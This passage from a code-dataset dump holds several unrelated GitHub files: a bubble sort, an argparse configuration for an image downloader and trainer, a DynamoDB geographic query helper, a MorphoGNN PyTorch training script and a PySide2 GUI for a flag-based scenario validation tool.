\n\n print('遍历次数:', i+1)\n\n\nvalues = [23,45,2,67,34,9,86,39,52,73,19,98,27]\nprint('原始数据:', values)\nbubble(values)\nprint(\"排序后:\", values)\nvalues = [100, 200, 2, 9, 19, 23, 27, 34, 39, 45, 52, 67, 73, 86, 98]\nbubble(values)\nprint(\"再次排序后:\", values)\n","repo_name":"index-zhc/stayreal","sub_path":"bubblesort.py","file_name":"bubblesort.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2747766435","text":"import argparse\n\ndef parse_arguments():\n parser = argparse.ArgumentParser(description='Open Image Dataset Downloader')\n\n parser.add_argument(\"command\",\n metavar=\"<command> 'downloader', 'train', 'all'.\",\n help=\"'downloader' or 'train' or 
'all'.\")\n # 'all' command perform both download and trainig\n parser.add_argument('--limit', required=False, type=int, default=None,\n metavar=\"integer number\",\n help='Optional limit on number of images to download')\n\n parser.add_argument('--n_threads', required=False, metavar=\"[default 20]\",\n help='Num of the threads to use')\n\n parser.add_argument('--classes', required=False, default='domains.txt',nargs='+',\n metavar=\"list of classes\",\n help=\"Sequence of 'strings' of the wanted classes\")\n\n parser.add_argument('--noLabels', required=False, action='store_true',\n help='No labels creations')\n\n parser.add_argument(\"--gpu_num\", type=int, default=0, help=\"select number of gpu\") # multi-gpu training function will be implemented later\n\n parser.add_argument(\"--epochs\", type=int, default=100, help=\"number of epochs\")\n parser.add_argument(\"--batch_size\", type=int, default=8, help=\"size of each image batch\")\n parser.add_argument(\"--model_def\", type=str, default=None, help=\"path to model definition file\")\n parser.add_argument(\"--pretrained_weights\", type=str, help=\"if specified starts from checkpoint model\")\n parser.add_argument(\"--checkpoint_interval\", type=int, default=5, help=\"interval between saving model weights\")\n parser.add_argument(\"--evaluation_interval\", type=int, default=5, help=\"interval evaluations on validation set\")\n parser.add_argument(\"--img_size\", type=int, default=416, help=\"size of each image dimension\")\n\n parser.add_argument(\"--logdir\", type=str, default=\"logs\", help=\"Defines the directory where the training log files are stored\")\n\n # From below, setting is not essential\n\n parser.add_argument('--Dataset', required=False,\n metavar=\"/path/to/custom/csv/\",\n help='Directory of the OID dataset folder')\n parser.add_argument('-y', '--yes', required=False, action='store_true',\n #metavar=\"Yes to download missing files\",\n help='ans Yes to possible download of missing files')\n\n parser.add_argument('--sub', required=False, choices=['h', 'm'],\n metavar=\"Subset of human verified images or machine generated (h or m)\",\n help='Download from the human verified dataset or from the machine generated one.')\n\n\n # image dataset option\n parser.add_argument('--image_IsOccluded', required=False, choices=['0', '1'],\n metavar=\"1 or 0\",\n help='Optional characteristic of the images. Indicates that the object is occluded by another object in the image.')\n parser.add_argument('--image_IsTruncated', required=False, choices=['0', '1'],\n metavar=\"1 or 0\",\n help='Optional characteristic of the images. Indicates that the object extends beyond the boundary of the image.')\n parser.add_argument('--image_IsGroupOf', required=False, choices=['0', '1'],\n metavar=\"1 or 0\",\n help='Optional characteristic of the images. Indicates that the box spans a group of objects (min 5).')\n parser.add_argument('--image_IsDepiction', required=False, choices=['0', '1'],\n metavar=\"1 or 0\",\n help='Optional characteristic of the images. Indicates that the object is a depiction.')\n parser.add_argument('--image_IsInside', required=False, choices=['0', '1'],\n metavar=\"1 or 0\",\n help='Optional characteristic of the images. 
Indicates a picture taken from the inside of the object.')\n\n # training option\n parser.add_argument(\"--gradient_accumulations\", type=int, default=2, help=\"number of gradient accums before step\")\n parser.add_argument(\"--n_cpu\", type=int, default=8, help=\"number of cpu threads to use during batch generation\")\n parser.add_argument(\"--compute_map\", default=False, help=\"if True computes mAP every tenth batch\")\n parser.add_argument(\"--multiscale_training\", default=True, help=\"allow for multi-scale training\")\n parser.add_argument(\"--verbose\", \"-v\", default=False, action='store_true', help=\"Makes the training more verbose\")\n\n\n return parser.parse_args()\n","repo_name":"worl6088/CCAI","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":4664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13269015396","text":"from typing import List\nimport boto3\nfrom boto3.dynamodb.types import TypeDeserializer\nimport os\nimport gzip\nimport json\n\n\ndynamodb = boto3.client('dynamodb')\ntable_name = os.environ['DYNAMO_TABLE']\ndeser = TypeDeserializer()\n\n\ndef deserialize(dynamodb_json):\n return {k: deser.deserialize(v) for k, v in dynamodb_json.items()}\n\n\ndef latitude_box_values(min_lat, max_lat):\n min_lat_int = int(float(min_lat) * 10)\n max_lat_int = int(float(max_lat) * 10)\n return range(min_lat_int, max_lat_int+1)\n\n\ndef dynamo_query(query_parameters):\n\n latitude_boxes = [str(latitude) for latitude in latitude_box_values(\n query_parameters.get(\"minLatitude\"),\n query_parameters.get(\"maxLatitude\"))]\n\n result = []\n for latitude_box in latitude_boxes:\n\n if query_parameters['webAvailable']:\n index_name = 'latitude-longitude-webavailable-index'\n key_name = 'latitude_box_webavailable'\n else:\n index_name = 'latitude-longitude-index'\n key_name = 'latitude_box'\n\n query = {\n 'TableName': table_name,\n 'IndexName': index_name,\n 'ReturnConsumedCapacity': 'TOTAL',\n 'KeyConditionExpression': f'{key_name} = :latitude_box AND longitude BETWEEN :minLongitude AND :maxLongitude', # noqa\n 'FilterExpression': '',\n 'ExpressionAttributeValues': {\n ':latitude_box': {\"N\": latitude_box},\n ':minLongitude': {\n \"N\": str(query_parameters.get(\"minLongitude\"))\n },\n ':maxLongitude': {\n \"N\": str(query_parameters.get(\"maxLongitude\"))\n }\n }\n }\n for key in query_parameters:\n if key in [\"minLongitude\", \"maxLongitude\"]:\n continue\n if key[:3] == \"min\":\n field = key.replace(\"min\", \"\")\n field = field[0].lower() + field[1:]\n query['FilterExpression'] += f\"{field} >= :{field}_min AND \"\n query['ExpressionAttributeValues'][f\":{field}_min\"] = {\n \"N\": str(query_parameters[key])\n }\n elif key[:3] == \"max\":\n field = key.replace(\"max\", \"\")\n field = field[0].lower() + field[1:]\n query['FilterExpression'] += f\"{field} <= :{field}_max AND \"\n query['ExpressionAttributeValues'][f\":{field}_max\"] = {\n \"N\": str(query_parameters[key])\n }\n else:\n field = key\n if type(query_parameters[key]) == list:\n if len(query_parameters[key]) > 0:\n values = ','.join([f':{field}_{idx}' for idx in range(\n len(query_parameters[key]))]\n )\n query['FilterExpression'] += f\"{field} IN ({values}) AND \" # noqa\n for idx, value in enumerate(query_parameters[key]):\n query['ExpressionAttributeValues'][\n f\":{field}_{idx}\"\n ] = {\"S\": value}\n else:\n query['FilterExpression'] += f\"{field} = :{field} AND \"\n value = query_parameters[key]\n if 
isinstance(value, str):\n value_type = \"S\"\n elif isinstance(value, bool):\n value_type = \"BOOL\"\n elif isinstance(value, (int, float)):\n value_type = \"N\"\n value = str(value)\n else:\n raise ValueError(f\"Unsupported data type for {key}: {type(value)}\") # noqa\n query['ExpressionAttributeValues'][f\":{field}\"] = {\n value_type: value\n }\n\n # removes trailing 'AND '\n query['FilterExpression'] = query['FilterExpression'][:-4]\n print(\"query = \", query)\n\n last_key = []\n consumed_capacity = 0\n while last_key is not None:\n response = dynamodb.query(\n **query, ExclusiveStartKey=last_key\n ) if last_key else dynamodb.query(**query)\n result += map(deserialize, response['Items'])\n consumed_capacity += response['ConsumedCapacity']['CapacityUnits']\n last_key = response.get('LastEvaluatedKey')\n\n print(\"CONSUMED_CAPACITY = \", consumed_capacity)\n\n return result\n\n# we currently don't have standard_data_gz in the dynamo database\n\n# def expand(id: List[str]) -> List[dict]:\n# id = list(id)\n\n# chunked_ids = [id[i:i+100] for i in range(0, len(id), 100)]\n# items = []\n# for chunk in chunked_ids:\n# response = dynamodb.batch_get_item(\n# RequestItems={\n# table_name: {\n# 'Keys': [{'id': {'S': i}} for i in chunk]\n# }\n# }\n# )\n# items.extend(response['Responses'][table_name])\n\n# items = [{\n# **{k: v for k, v in item.items() if k != 'standard_data_gz'},\n# 'standard_data': json.loads(gzip.decompress(\n# item['standard_data_gz'].value\n# ).decode('utf-8'))\n# } for item in map(deserialize, items)\n# ]\n\n# return items\n","repo_name":"AshrafE3/redzilla-search-x","sub_path":"chalicelib/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":5361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71926046565","text":"import torch\nimport torch.nn as nn\nimport torch.nn.init as init\nimport tqdm\nimport numpy as np\nfrom dataset import DataSet\nimport torch.optim as optim\nimport sklearn.metrics as metrics\nfrom torch.optim.lr_scheduler import CosineAnnealingLR, StepLR\nimport torch.nn.functional as F\n\n\ndef knn(x, k):\n inner = -2 * torch.matmul(x.transpose(2, 1), x)\n xx = torch.sum(x ** 2, dim=1, keepdim=True)\n pairwise_distance = -xx - inner - xx.transpose(2, 1)\n\n idx = pairwise_distance.topk(k=k, dim=-1)[1]\n return idx\n\ndef get_graph_feature(x, k=20, idx=None, dim9=False):\n batch_size = x.size(0)\n num_points = x.size(2)\n x = x.view(batch_size, -1, num_points)\n if idx is None:\n if dim9 == False:\n idx = knn(x, k=k)\n else:\n idx = knn(x[:, 6:], k=k)\n device = torch.device('cuda')\n\n idx_base = torch.arange(0, batch_size, device=device).view(-1, 1, 1) * num_points\n\n idx = idx + idx_base\n\n idx = idx.view(-1)\n\n _, num_dims, _ = x.size()\n\n x = x.transpose(2,1).contiguous()\n feature = x.view(batch_size * num_points, -1)[idx, :]\n feature = feature.view(batch_size, num_points, k, num_dims)\n x = x.view(batch_size, num_points, 1, num_dims).repeat(1, 1, k, 1)\n\n feature = torch.cat((feature - x, x), dim=3).permute(0, 3, 1, 2).contiguous()\n\n return feature\n\nclass MorphoGNN(nn.Module):\n def __init__(self, num_classes=7):\n super(MorphoGNN, self).__init__()\n\n self.bn1 = nn.BatchNorm2d(32)\n self.bn2 = nn.BatchNorm2d(64)\n self.bn3 = nn.BatchNorm2d(128)\n self.bn4 = nn.BatchNorm2d(256)\n self.bn5 = nn.BatchNorm1d(1024)\n\n self.conv1 = nn.Sequential(nn.Conv2d(6, 32, kernel_size=1, bias=False),\n self.bn1,\n nn.LeakyReLU(negative_slope=0.2))\n self.conv2 = 
nn.Sequential(nn.Conv2d(32 * 2, 64, kernel_size=1, bias=False),\n self.bn2,\n nn.LeakyReLU(negative_slope=0.2))\n self.conv3 = nn.Sequential(nn.Conv2d(96 * 2, 128, kernel_size=1, bias=False),\n self.bn3,\n nn.LeakyReLU(negative_slope=0.2))\n self.conv4 = nn.Sequential(nn.Conv2d(224 * 2, 256 , kernel_size=1, bias=False),\n self.bn4,\n nn.LeakyReLU(negative_slope=0.2))\n self.conv5 = nn.Sequential(nn.Conv1d(480, 1024, kernel_size=1, bias=False),\n self.bn5,\n nn.LeakyReLU(negative_slope=0.2))\n self.linear1 = nn.Linear(1024 * 2, 512, bias=False)\n self.bn6 = nn.BatchNorm1d(512)\n self.linear2 = nn.Linear(512, 256)\n self.bn7 = nn.BatchNorm1d(256)\n self.dp3 = nn.Dropout(p=0.2)\n self.linear3 = nn.Linear(256, num_classes)\n\n def forward(self, x):\n batch_size = x.size(0)\n x1 = get_graph_feature(x, k=8)\n x1 = self.conv1(x1)\n x1 = x1.max(dim=-1, keepdim=False)[0]\n\n x2 = get_graph_feature(x1, k=16)\n x2 = self.conv2(x2)\n x2 = x2.max(dim=-1, keepdim=False)[0]\n\n x = torch.cat((x1,x2),1)\n\n x3 = get_graph_feature(x, k=32)\n x3 = self.conv3(x3)\n x3 = x3.max(dim=-1, keepdim=False)[0]\n\n x = torch.cat((x1, x2, x3), 1)\n\n x4 = get_graph_feature(x, k=64)\n x4 = self.conv4(x4)\n x4 = x4.max(dim=-1, keepdim=False)[0]\n\n x = torch.cat((x1, x2, x3, x4), 1)\n\n x = self.conv5(x)\n x1 = F.adaptive_max_pool1d(x, 1).view(batch_size,-1)\n x2 = F.adaptive_avg_pool1d(x, 1).view(batch_size,-1)\n x = torch.cat((x1, x2), 1)\n\n self.feature = x\n x = self.linear1(x)\n x = F.leaky_relu(self.bn6(x), negative_slope=0.2)\n x = F.leaky_relu(self.bn7(self.linear2(x)), negative_slope=0.2)\n x = self.dp3(x)\n x = self.linear3(x)\n\n return self.feature,x\n\n\ndef euclidean_dist(x, y):\n m, n = x.size(0), y.size(0)\n xx = torch.pow(x, 2).sum(1, keepdim=True).expand(m, n)\n yy = torch.pow(y, 2).sum(dim=1, keepdim=True).expand(n, m).t()\n dist = xx + yy\n dist.addmm_(1, -2, x, y.t())\n dist = dist.clamp(min=1e-12).sqrt()\n return dist\n\n\ndef cosine_dist(x, y):\n bs1, bs2 = x.size(0), y.size(0)\n frac_up = torch.matmul(x, y.transpose(0, 1))\n frac_down = (torch.sqrt(torch.pow(x, 2).sum(dim=1)).view(bs1, 1).repeat(1, bs2)) * \\\n (torch.sqrt(torch.pow(y, 2).sum(dim=1).view(1, bs2).repeat(bs1, 1)))\n cosine = frac_up / frac_down\n cos_d = 1 - cosine\n return cos_d\n\n\ndef _batch_hard(mat_distance, mat_similarity, indice=False):\n sorted_mat_distance, positive_indices = torch.sort(mat_distance + (-100000.0) * (1 - mat_similarity), dim=1,\n descending=True)\n hard_p = sorted_mat_distance[:, 0]\n hard_p_indice = positive_indices[:, 0]\n sorted_mat_distance, negative_indices = torch.sort(mat_distance + 100000.0 * mat_similarity, dim=1,\n descending=False)\n hard_n = sorted_mat_distance[:, 0]\n hard_n_indice = negative_indices[:, 0]\n if (indice):\n return hard_p, hard_n, hard_p_indice, hard_n_indice\n return hard_p, hard_n\n\n\nclass TripletLoss(nn.Module):\n def __init__(self, margin=0.5, normalize_feature=True):\n super(TripletLoss, self).__init__()\n self.margin = margin\n self.normalize_feature = normalize_feature\n self.margin_loss = nn.MarginRankingLoss(margin=margin)\n\n def forward(self, emb, label):\n if self.normalize_feature:\n emb = F.normalize(emb)\n\n mat_dist = euclidean_dist(emb, emb)\n\n assert mat_dist.size(0) == mat_dist.size(1)\n N = mat_dist.size(0)\n mat_sim = label.expand(N, N).eq(label.expand(N, N).t()).float()\n\n dist_ap, dist_an = _batch_hard(mat_dist, mat_sim)\n assert dist_an.size(0) == dist_ap.size(0)\n y = torch.ones_like(dist_ap)\n loss = self.margin_loss(dist_an, dist_ap, y)\n\n prec = 
(dist_an.data > dist_ap.data).sum() * 1.0 / y.size(0)\n return loss, prec\n\nif __name__ == '__main__':\n train_dataset = DataSet(train=True)\n test_dataset = DataSet(train=False)\n train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=4, shuffle=True, num_workers=2,\n drop_last=True)\n test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=4, shuffle=False, num_workers=2,\n drop_last=True)\n model = MorphoGNN().to('cuda')\n opt = optim.Adam(model.parameters(), lr=0.001, weight_decay=1e-4)\n scheduler = StepLR(opt, step_size=20, gamma=0.5)\n criterion_CrossEntropy = nn.CrossEntropyLoss()\n criterion_triple = TripletLoss()\n\n best_test_acc = 0\n best_test_avg_acc = 0\n for epoch in range(50):\n train_loss = 0.0\n train_triplet_loss = 0.0\n train_ce_loss = 0.0\n count = 0.0\n model.train()\n train_pred = []\n train_true = []\n tqdm_batch = tqdm.tqdm(train_loader, desc='Epoch-{} training'.format(epoch))\n for data, label in tqdm_batch:\n data = data.type(torch.FloatTensor)\n label = label.type(torch.LongTensor)\n data, label = data.to('cuda'), label.to('cuda').squeeze()\n data = data.permute(0, 2, 1)\n batch_size = data.size()[0]\n opt.zero_grad()\n features, logits = model(data)\n preds = logits.max(dim=1)[1]\n count += batch_size\n triplet_loss,_ = criterion_triple(features,label)\n ce_loss = criterion_CrossEntropy(logits,label)\n loss = triplet_loss * 1 + ce_loss\n loss.backward()\n opt.step()\n train_triplet_loss += triplet_loss.item() * batch_size\n train_ce_loss += ce_loss.item() * batch_size\n train_loss += loss.item() * batch_size\n train_true.append(label.cpu().numpy())\n train_pred.append(preds.detach().cpu().numpy())\n tqdm_batch.close()\n\n if opt.param_groups[0]['lr'] > 1e-5:\n scheduler.step()\n if opt.param_groups[0]['lr'] < 1e-5:\n for param_group in opt.param_groups:\n param_group['lr'] = 1e-5\n\n train_true = np.concatenate(train_true)\n train_pred = np.concatenate(train_pred)\n print('Train %d, loss: %.6f, triplet_loss: %.6f, CE_loss: %.6f, train acc: %.6f, train avg acc: %.6f' % (epoch,train_loss * 1.0 / count,\n train_triplet_loss * 1.0/count, train_ce_loss * 1.0/count,\n metrics.accuracy_score(train_true, train_pred),\n metrics.balanced_accuracy_score(train_true, train_pred)))\n\n with torch.no_grad():\n test_loss = 0.0\n test_triplet_loss = 0.0\n test_ce_loss = 0.0\n count = 0.0\n model.eval()\n test_pred = []\n test_true = []\n tqdm_batch = tqdm.tqdm(test_loader, desc='Epoch-{} testing'.format(epoch))\n for data, label in tqdm_batch:\n data = data.type(torch.FloatTensor)\n label = label.type(torch.LongTensor)\n data, label = data.to('cuda'), label.to('cuda').squeeze()\n data = data.permute(0, 2, 1)\n batch_size = data.size()[0]\n features, logits = model(data)\n preds = logits.max(dim=1)[1]\n triplet_loss, _ = criterion_triple(features, label)\n ce_loss = criterion_CrossEntropy(logits, label)\n loss = triplet_loss * 1 + ce_loss\n count += batch_size\n test_loss += loss.item() * batch_size\n test_triplet_loss += triplet_loss.item() * batch_size\n test_ce_loss += ce_loss.item() * batch_size\n test_true.append(label.cpu().numpy())\n test_pred.append(preds.detach().cpu().numpy())\n test_true = np.concatenate(test_true)\n test_pred = np.concatenate(test_pred)\n test_acc = metrics.accuracy_score(test_true, test_pred)\n avg_per_class_acc = metrics.balanced_accuracy_score(test_true, test_pred)\n tqdm_batch.close()\n print('Test %d, loss: %.6f, triplet_loss: %.6f, CE_loss: %.6f, test acc: %.6f, test avg acc: %.6f' % (epoch,\n 
test_loss*1.0/count,test_triplet_loss*1.0/count,\n test_ce_loss*1.0/count,test_acc,\n avg_per_class_acc))\n if test_acc >= best_test_acc:\n best_test_acc = test_acc\n best_test_avg_acc = avg_per_class_acc\n torch.save(model.state_dict(), './MorphoGNN.t7')\n print('best acc: ',best_test_acc,' best avg acc: ',best_test_avg_acc)\n","repo_name":"fun0515/MorphoGNN","sub_path":"MorphoGNN.py","file_name":"MorphoGNN.py","file_ext":"py","file_size_in_byte":11322,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"9274459637","text":"from turtle import width\nfrom PySide2 import *\nimport json\nimport sys\nimport os\n\nfrom ui_untitled_demo import *\nfrom main import *\nfrom constants import *\n\n#########################################\n#########################################\n## VIEW\n#########################################\n#########################################\n\n#########################################\n## Method to generate one scenario card widget\n#########################################\ndef generateCards2(self, scenario):\n ## Calculating the position based on the id\n positionX = 0 if scenario.id < 4 else 1 \n positionY = (scenario.id - 1) % 3 \n \n self.card = QFrame(self.ui.scrollAreaWidgetContents)\n self.card.setObjectName(u\"scenario_\" + str(scenario.id))\n self.card.setMinimumSize(QSize(200, 200))\n self.card.setMaximumSize(QSize(300, 300))\n self.card.setStyleSheet(u\"border-radius: 25% 10%;\\n\"\n \"background-color: rgb(158, 158, 158);\\n\"\n \"border-style: solid;\")\n self.card.setFrameShape(QFrame.StyledPanel)\n self.card.setFrameShadow(QFrame.Raised)\n self.verticalLayout_2 = QVBoxLayout(self.card)\n self.verticalLayout_2.setSpacing(0)\n self.verticalLayout_2.setObjectName(u\"verticalLayout_2\")\n self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)\n self.header_frame = QFrame(self.card)\n self.header_frame.setObjectName(u\"header_frame_\" + str(scenario.id))\n self.header_frame.setStyleSheet(u\"background-color: rgb(112, 112, 112);\\n\"\n \"border-bottom-left-radius: 0px;\\n\"\n \"border-bottom-right-radius: 0px;\\n\"\n \"border-bottom: 6px groove;\\n\"\n \"border-bottom-color: rgb(58, 58, 58);\")\n self.header_frame.setFrameShape(QFrame.StyledPanel)\n self.header_frame.setFrameShadow(QFrame.Raised)\n self.gridLayout_2 = QGridLayout(self.header_frame)\n self.gridLayout_2.setObjectName(u\"gridLayout_2_\" + str(scenario.id))\n self.lb_scenario_name = QLabel(self.header_frame)\n self.lb_scenario_name.setObjectName(u\"lb_scenario_name_\" + str(scenario.id))\n font = QFont()\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.lb_scenario_name.setFont(font)\n self.lb_scenario_name.setStyleSheet(u\"border-bottom: hidden;\\n\"\n \"color: rgb(235, 235, 235);\\n\"\n \"\")\n\n self.gridLayout_2.addWidget(self.lb_scenario_name, 0, 1, 2, 1)\n\n\n self.verticalLayout_2.addWidget(self.header_frame)\n\n self.progress_frame = QFrame(self.card)\n self.progress_frame.setObjectName(u\"progress_frame_\" + str(scenario.id))\n self.progress_frame.setFrameShape(QFrame.StyledPanel)\n self.progress_frame.setFrameShadow(QFrame.Raised)\n self.verticalLayout_3 = QVBoxLayout(self.progress_frame)\n self.verticalLayout_3.setObjectName(u\"verticalLayout_3_\" + str(scenario.id))\n self.lb_complete = QLabel(self.progress_frame)\n self.lb_complete.setObjectName(\"lb_complete_\" + str(scenario.id))\n font1 = QFont()\n font1.setPointSize(10)\n font1.setBold(True)\n font1.setWeight(75)\n 
self.lb_complete.setFont(font1)\n\n
        self.verticalLayout_3.addWidget(self.lb_complete, 0, Qt.AlignHCenter)\n\n
        self.progressBar = QProgressBar(self.progress_frame)\n
        self.progressBar.setObjectName(u\"progressBar_\" + str(scenario.id))\n
        self.progressBar.setStyleSheet(u\"background-color: rgb(232, 232, 232);\")\n
        setattr(self.ui, \"progressBar_\" + str(scenario.id), self.progressBar)\n
        ## setting value based on the current progress\n
        updateProgressBar(self, scenario)\n\n
        self.verticalLayout_3.addWidget(self.progressBar)\n\n\n
        self.verticalLayout_2.addWidget(self.progress_frame, 0, Qt.AlignTop)\n\n
        self.footer_frame = QFrame(self.card)\n
        self.footer_frame.setObjectName(u\"footer_frame_\" + str(scenario.id))\n
        self.footer_frame.setFrameShape(QFrame.StyledPanel)\n
        self.footer_frame.setFrameShadow(QFrame.Raised)\n
        self.horizontalLayout = QHBoxLayout(self.footer_frame)\n
        self.horizontalLayout.setObjectName(u\"horizontalLayout_\" + str(scenario.id))\n
        self.bt_start = QPushButton(self.footer_frame)\n
        self.bt_start.setObjectName(u\"bt_start\" + str(scenario.id))\n
        sizePolicy = QSizePolicy(QSizePolicy.Minimum, QSizePolicy.Preferred)\n
        sizePolicy.setHorizontalStretch(5)\n
        sizePolicy.setVerticalStretch(5)\n
        sizePolicy.setHeightForWidth(self.bt_start.sizePolicy().hasHeightForWidth())\n
        self.bt_start.setSizePolicy(sizePolicy)\n
        font2 = QFont()\n
        font2.setPointSize(12)\n
        self.bt_start.setFont(font2)\n
        self.bt_start.setCursor(QCursor(Qt.PointingHandCursor))\n
        self.bt_start.setStyleSheet(u\"background-color: rgb(7, 226, 87);\")\n\n
        self.horizontalLayout.addWidget(self.bt_start)\n\n\n
        self.verticalLayout_2.addWidget(self.footer_frame)\n\n
        self.lb_scenario_name.setText(QCoreApplication.translate(\"MainWindow\", u\"\" + scenario.title, None))\n
        self.lb_scenario_name.setWordWrap(True)\n
        self.lb_complete.setText(QCoreApplication.translate(\"MainWindow\", u\"Complete\", None))\n
        self.bt_start.setText(QCoreApplication.translate(\"MainWindow\", u\"Start\", None))\n\n
        self.bt_start.clicked.connect(lambda: self.ui.sw_header.setCurrentWidget(self.ui.tasks_header))\n
        self.bt_start.clicked.connect(lambda: self.ui.sw_lists.setCurrentWidget(self.ui.tasks))\n
        self.bt_start.clicked.connect(lambda: generateTasks(self, scenario))\n\n
        self.ui.gridLayout.addWidget(self.card, positionX, positionY, 1, 1, Qt.AlignHCenter | Qt.AlignVCenter)\n\n
#########################################\n
## Method to generate task widget\n
#########################################\n
def generateTasks(self, scenario):\n
    ## HEADER\n
    ## Init buttons and set titles\n
    ## Activate back button\n
    self.ui.bt_back.clicked.connect(lambda: self.ui.sw_header.setCurrentWidget(self.ui.scenarios_header))\n
    self.ui.bt_back.clicked.connect(lambda: self.ui.sw_lists.setCurrentWidget(self.ui.scenarios))\n
    self.ui.bt_back.clicked.connect(lambda: calculateCurrent(self, scenario))\n
    ## Set title\n
    self.ui.lb_scenario_name_in_task_header.setText(QCoreApplication.translate(\"MainWindow\", scenario.title, None))\n\n
    ## BODY\n
    ## Init previous/next step buttons and set labels (hide success label + update description)\n
    # Disable previous button on first step and next button on last step\n
    # Disable next button if the current one is unfinished\n
    disableButtons(self, scenario)\n\n
    # the last argument is a flag that distinguishes which button was pressed\n
    self.ui.bt_previous.clicked.connect(lambda: generateTask(self, scenario, -1))\n
    self.ui.bt_next.clicked.connect(lambda: generateTask(self, scenario, 1))\n
    generateTask(self, scenario, 0)\n
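\n# NOTE: the direction flag passed to generateTask means: -1 = go back to the\n
# previous step, 0 = redraw the current step, 1 = advance to the next step\n
# (see the branches in generateTask below).\n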
\n#########################################\n
## Method to disable next/previous buttons\n
#########################################\n
def disableButtons(self, scenario):\n
    # Disable previous button on first step and next button on last step\n
    # Disable next button if the current one is unfinished\n
    if scenario.current == 1:\n
        self.ui.bt_previous.setEnabled(False)\n
    else:\n
        self.ui.bt_previous.setEnabled(True)\n\n
    validationID = scenario.current - 1\n
    if scenario.steps < scenario.current + 1:\n
        self.ui.bt_next.setEnabled(False)\n
    elif scenario.validations[validationID + 1].completed == \"false\":\n
        self.ui.bt_next.setEnabled(False)\n
    else:\n
        self.ui.bt_next.setEnabled(True)\n\n
#########################################\n
## Method to generate one task widget\n
#########################################\n
def generateTask(self, scenario, bt_clicked):\n
    task_to_generate = scenario.validations[0]\n\n
    if bt_clicked == 0:\n
        task_to_generate = scenario.validations[scenario.current - 1]\n
    elif bt_clicked == 1:\n
        task_to_generate = scenario.validations[scenario.current]\n
        scenario.current = task_to_generate.id\n
        disableButtons(self, scenario)\n
    elif bt_clicked == -1:\n
        task_to_generate = scenario.validations[scenario.current - 2]\n
        scenario.current = task_to_generate.id\n
        disableButtons(self, scenario)\n\n
    # Change header\n
    self.ui.lb_validation_step_in_task_header.setText(QCoreApplication.translate(\"MainWindow\", u\"Task \" + str(scenario.current) + \" / \" + str(scenario.steps), None))\n\n
    if task_to_generate.completed == \"true\":\n
        disableUI(self)\n
    else:\n
        enableUI(self)\n\n
    ######################################################################\n
    ## SETTING TEXT AND METHODS\n
    ######################################################################\n\n
    self.ui.lb_description.setText(QCoreApplication.translate(\"MainWindow\", task_to_generate.task, None))\n
    self.ui.lb_msg_success.setText(QCoreApplication.translate(\"MainWindow\", \"\", None))\n
    self.ui.lineEdit.setText(QCoreApplication.translate(\"MainWindow\", \"\", None))\n\n
    if task_to_generate.type == 'flag':\n
        self.ui.lineEdit.setPlaceholderText(QCoreApplication.translate(\"MainWindow\", u\"Insert flag\", None))\n
    elif task_to_generate.type in ('internal command', 'external command'):\n
        self.ui.lineEdit.setPlaceholderText(QCoreApplication.translate(\"MainWindow\", u\"Submit to start automated test\", None))\n
        self.ui.lineEdit.setReadOnly(True)\n
    elif task_to_generate.type == 'none':\n
        self.ui.lineEdit.setPlaceholderText(QCoreApplication.translate(\"MainWindow\", u\"Submit to continue\", None))\n
        self.ui.lineEdit.setReadOnly(True)\n\n
    listOfObjects = [self.ui.lineEdit, self.ui.bt_submit, self.ui.lb_msg_success]\n\n
    self.ui.bt_submit.setText(QCoreApplication.translate(\"MainWindow\", u\"Submit\", None))\n
    self.ui.bt_submit.clicked.connect(lambda: validate(self, task_to_generate, listOfObjects, scenario))\n
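\n# NOTE: each call to generateTask connects another handler to bt_submit.clicked;\n
# on repeated visits Qt fires all stacked handlers, so disconnecting the previous\n
# handler first may be necessary if duplicate submissions show up.\n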
\n#########################################\n
## Method to add some attributes to UI elements\n
#########################################\n
def customUISetup(self):\n
    self.ui.setupUi(self)\n
    ## REMOVE WINDOW FRAME\n
    self.setWindowFlags(QtCore.Qt.FramelessWindowHint)\n
    ## ADD EFFECTS\n
    self.setAttribute(QtCore.Qt.WA_TranslucentBackground)\n
    self.shadow = QGraphicsDropShadowEffect(self)\n
    self.shadow.setBlurRadius(50)\n
    self.shadow.setXOffset(0)\n
    self.shadow.setYOffset(0)\n
    self.shadow.setColor(QColor(0, 92, 157, 550))\n
    self.ui.centralwidget.setGraphicsEffect(self.shadow)\n
    ## CHANGE TITLE AND ICON\n
    self.setWindowIcon(QtGui.QIcon(\":/icons/icons8-system-information-50.png\"))\n
    self.setWindowTitle(\"Validation System\")\n\n
    ## CONNECT CLOSE AND MINIMIZE BUTTONS\n
    self.ui.bt_minimize_window.clicked.connect(lambda: self.showMinimized())\n
    self.ui.bt_close_window.clicked.connect(lambda: self.close())\n\n
#########################################\n
## Method to validate the solution\n
#########################################\n
def validate(self, validation, listOfObjects, scenario):\n
    answer = listOfObjects[0]\n
    button = listOfObjects[1]\n
    label = listOfObjects[2]\n\n
    response = getFlagcheck(self, scenario.id, validation.id, answer.text())\n
    print(response.status_code)\n
    if response.status_code == 200:\n
        api_answer = response.json()\n
        if api_answer['answer'] == 'True':\n
            validateSuccess(self, validation, answer, button, label, scenario)\n
        elif api_answer['answer'] == 'False':\n
            label.setText(QCoreApplication.translate(\"MainWindow\", u\"Wrong!\", None))\n
            label.setStyleSheet(u\"color: rgb(255, 21, 21);\")\n
        elif api_answer['answer'] != '':\n
            # run the controlling script returned by the API\n
            result = runControllScript(self, api_answer['answer'], scenario.id, validation.id)\n
            print(\"Result from API: \" + result)\n
            if result == 'True':\n
                validateSuccess(self, validation, answer, button, label, scenario)\n
            elif result == 'False':\n
                label.setText(QCoreApplication.translate(\"MainWindow\", u\"Wrong!\", None))\n
                label.setStyleSheet(u\"color: rgb(255, 21, 21);\")\n\n
def validateSuccess(self, validation, answer, button, label, scenario):\n
    # update components\n
